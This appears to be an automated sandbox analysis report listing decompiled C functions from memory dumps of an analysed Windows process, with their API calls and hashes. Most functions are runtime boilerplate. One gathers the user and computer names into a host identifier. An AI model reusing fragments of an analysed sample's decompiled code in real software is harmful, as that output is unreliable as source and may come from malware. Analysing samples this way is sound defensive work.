                                                                                                                                                                                                                                • Opcode ID: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction ID: a2c6762b99dba583604e148ca0d4e46b457bccef109de54f29a85d27c6923ba1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40218E72638205AFEF119F71DD80F5A7BBFAB402A87144614E52ADB3C0EB31DD5287A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D8834(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				WCHAR* _v8;
                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                				WCHAR* _t12;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t18;
                                                                                                                                                                                                                                				signed int* _t22;
                                                                                                                                                                                                                                				signed int* _t26;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t29;
                                                                                                                                                                                                                                				WCHAR* _t31;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t26 = _a4;
                                                                                                                                                                                                                                				while(_t26 != _a8) {
                                                                                                                                                                                                                                					_t11 =  *_t26;
                                                                                                                                                                                                                                					_t22 = 0x736ef518 + _t11 * 4;
                                                                                                                                                                                                                                					_t29 =  *_t22;
                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                						_t12 =  *(0x736e1b00 + _t11 * 4);
                                                                                                                                                                                                                                						_v8 = _t12;
                                                                                                                                                                                                                                						_t29 = LoadLibraryExW(_t12, 0, 0x800);
                                                                                                                                                                                                                                						if(_t29 != 0) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							 *_t22 = _t29;
                                                                                                                                                                                                                                							if( *_t22 != 0) {
                                                                                                                                                                                                                                								FreeLibrary(_t29);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                                							_t16 = _t29;
                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                							return _t16;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = GetLastError();
                                                                                                                                                                                                                                						if(_t18 != 0x57) {
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							 *_t22 = _t18 | 0xffffffff;
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							_t26 =  &(_t26[1]);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t31 = _v8;
                                                                                                                                                                                                                                						_t18 = E736D9913(_t31, L"api-ms-", 7);
                                                                                                                                                                                                                                						_t32 = _t32 + 0xc;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = LoadLibraryExW(_t31, 0, 0);
                                                                                                                                                                                                                                						_t29 = _t18;
                                                                                                                                                                                                                                						if(_t29 != 0) {
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t29 != 0xffffffff) {
                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D88F5,00000000,?,00000001,00000000,?,736D896C,00000001,FlsFree,736E1BBC,FlsFree,00000000), ref: 736D88C4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                • Opcode ID: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction ID: 5d2e58dd57d7c3d07b60fc2566b4470bb635626ff78098474deb944e90907e93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11CA72E61620EBDF139B69CD4CB4933B9AF41B71F290251E916FB1C4D770E90486D4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                                			E736D8E50(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t8;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				_t8 =  &_v8;
                                                                                                                                                                                                                                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                                                                                                                                                                                                                                				if(_t8 != 0) {
                                                                                                                                                                                                                                					_t8 = GetProcAddress(_v8, "CorExitProcess");
                                                                                                                                                                                                                                					_t14 = _t8;
                                                                                                                                                                                                                                					if(_t14 != 0) {
                                                                                                                                                                                                                                						 *0x736e1104(_a4);
                                                                                                                                                                                                                                						_t8 =  *_t14();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					return FreeLibrary(_v8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E65
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 736D8E78
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E9B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction ID: 176e972b41e59aed32b431ad836198e4bbf432327f2d2d4b1fd7f101123bfb0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F05E76A51218FBCF01AB52CE0DB9E7A78FB01B56F204190EC0AE6194CB744E04EA91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A87095() {
                                                                                                                                                                                                                                				void* _v0;
                                                                                                                                                                                                                                				void** _t3;
                                                                                                                                                                                                                                				void** _t5;
                                                                                                                                                                                                                                				void** _t7;
                                                                                                                                                                                                                                				void** _t8;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t3 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t5 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                					if( *_t1 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					Sleep(0xa);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t7 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                				_t10 =  *_t7;
                                                                                                                                                                                                                                				if(_t10 != 0 && _t10 != 0xa8e823) {
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _t10);
                                                                                                                                                                                                                                					_t7 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_t7 = _v0;
                                                                                                                                                                                                                                				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                				__imp__(_t8);
                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A8709E
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A85884), ref: 00A870A8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00A85884), ref: 00A870D6
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A870EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 0b79c77b6f8378a4021e4abd13699204171a483b334f571e5ab917a8df87432e
                                                                                                                                                                                                                                • Instruction ID: 3faafb050a7b22f8cf0f5b8c73c87f070ce5e79ea6ff2c91997ca9e368682d19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b79c77b6f8378a4021e4abd13699204171a483b334f571e5ab917a8df87432e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F0B2B5A08200DFEB18EBA4EE99E1937B4EB05351B144018A502CB2A0D730EC42AB21
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A86706() {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				int _v16;
                                                                                                                                                                                                                                				long _t39;
                                                                                                                                                                                                                                				long _t43;
                                                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                                                				short _t51;
                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                				int _t56;
                                                                                                                                                                                                                                				int _t57;
                                                                                                                                                                                                                                				char* _t64;
                                                                                                                                                                                                                                				short* _t67;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                				_t39 = _v8;
                                                                                                                                                                                                                                				if(_t39 != 0) {
                                                                                                                                                                                                                                					_v12 = _t39;
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                					_t43 = _v8;
                                                                                                                                                                                                                                					if(_t43 != 0) {
                                                                                                                                                                                                                                						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                						_t64 = E00A85157(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                						if(_t64 != 0) {
                                                                                                                                                                                                                                							_t47 = _v12;
                                                                                                                                                                                                                                							_t67 = _t64 + _t47 * 2;
                                                                                                                                                                                                                                							_v8 = _t47;
                                                                                                                                                                                                                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                                                                                                                								L7:
                                                                                                                                                                                                                                								E00A853BB(_t64);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t51 = 0x40;
                                                                                                                                                                                                                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                                                                                                                								_t52 = _v8;
                                                                                                                                                                                                                                								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                									goto L7;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                									_t31 = _t56 + 2; // 0xa8a626
                                                                                                                                                                                                                                									_v12 = _t56;
                                                                                                                                                                                                                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                									_v8 = _t57;
                                                                                                                                                                                                                                									if(_t57 == 0) {
                                                                                                                                                                                                                                										goto L7;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t64[_t57] = 0;
                                                                                                                                                                                                                                										_v16 = _t64;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v16;
                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A8A624), ref: 00A8671A
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00A8A624), ref: 00A86736
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A8A624), ref: 00A86770
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00A8A624,?), ref: 00A86793
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00A8A624,00000000,00A8A626,00000000,00000000,?,?,00A8A624), ref: 00A867B6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850880919-0
                                                                                                                                                                                                                                • Opcode ID: b5b67de33bbaf6bae2cfd5f5208afabfa76a614f487a763241dc22b83863b88e
                                                                                                                                                                                                                                • Instruction ID: 8f9a777a09a8e97dd13faad7fe6e6eae994dbbe320f961a78ce467ebe70254f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5b67de33bbaf6bae2cfd5f5208afabfa76a614f487a763241dc22b83863b88e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21E876900208FFDB11EFE9C985DEEBBB8EF44744B2044AAE502E7240E7309B45DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DE977(intOrPtr* _a4) {
                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t21 = _a4;
                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                					_t23 =  *_t21 -  *0x736eb6f8; // 0x736eb748
                                                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x736eb6fc; // 0x736efb20
                                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t8);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x736eb700; // 0x736efb20
                                                                                                                                                                                                                                					if(_t25 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t9);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x736eb728; // 0x736eb74c
                                                                                                                                                                                                                                					if(_t26 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t10);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                					_t27 = _t6 -  *0x736eb72c; // 0x736efb24
                                                                                                                                                                                                                                					if(_t27 != 0) {
                                                                                                                                                                                                                                						return E736DA293(_t6);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t6;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE98F
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9A1
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9B3
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9C5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9D7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 9bad553d5c7c4955ffe25476545b5191014ef54c13574ff0bb5baf07eadcd70c
                                                                                                                                                                                                                                • Instruction ID: f29c1593be9b63d06d2dc35ea2a833e974e703468a758a93678c0f7635191466
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bad553d5c7c4955ffe25476545b5191014ef54c13574ff0bb5baf07eadcd70c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F09C769693009BCF45DB66D689F1633E9FA007107780919F09FDB7C0C735F99086A8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                			E736DA485(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				signed int _v6;
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                				signed int _v36;
                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                				intOrPtr* _v72;
                                                                                                                                                                                                                                				intOrPtr* _v104;
                                                                                                                                                                                                                                				intOrPtr* _v108;
                                                                                                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                                                                                                				signed int _v124;
                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                                                                                				char _v609;
                                                                                                                                                                                                                                				intOrPtr* _v616;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v620;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v624;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v628;
                                                                                                                                                                                                                                				signed int _v632;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v636;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v640;
                                                                                                                                                                                                                                				signed int _v644;
                                                                                                                                                                                                                                				signed int _v648;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v652;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v656;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v660;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v664;
                                                                                                                                                                                                                                				signed int _v668;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v672;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v676;
                                                                                                                                                                                                                                				intOrPtr _v724;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				intOrPtr* _t131;
                                                                                                                                                                                                                                				signed int _t132;
                                                                                                                                                                                                                                				signed int _t134;
                                                                                                                                                                                                                                				signed int _t139;
                                                                                                                                                                                                                                				signed int _t140;
                                                                                                                                                                                                                                				intOrPtr* _t150;
                                                                                                                                                                                                                                				signed int _t152;
                                                                                                                                                                                                                                				intOrPtr _t153;
                                                                                                                                                                                                                                				signed int _t157;
                                                                                                                                                                                                                                				signed int _t159;
                                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                                				signed int _t166;
                                                                                                                                                                                                                                				char _t168;
                                                                                                                                                                                                                                				signed char _t169;
                                                                                                                                                                                                                                				signed int _t175;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t179;
                                                                                                                                                                                                                                				signed int _t185;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t188;
                                                                                                                                                                                                                                				intOrPtr* _t196;
                                                                                                                                                                                                                                				signed int _t199;
                                                                                                                                                                                                                                				intOrPtr _t204;
                                                                                                                                                                                                                                				signed int _t206;
                                                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                                                				signed int _t211;
                                                                                                                                                                                                                                				signed int _t212;
                                                                                                                                                                                                                                				signed int _t213;
                                                                                                                                                                                                                                				signed int _t215;
                                                                                                                                                                                                                                				signed int _t217;
                                                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                                                				signed int* _t219;
                                                                                                                                                                                                                                				signed int _t222;
                                                                                                                                                                                                                                				void* _t225;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t226;
                                                                                                                                                                                                                                				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E736D9191(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E736DD1A7(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E736DA176();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
                                                                                                                                                                                                                                										_t285 = _a8;
                                                                                                                                                                                                                                										_t241 = _t239 - _t277 + 1;
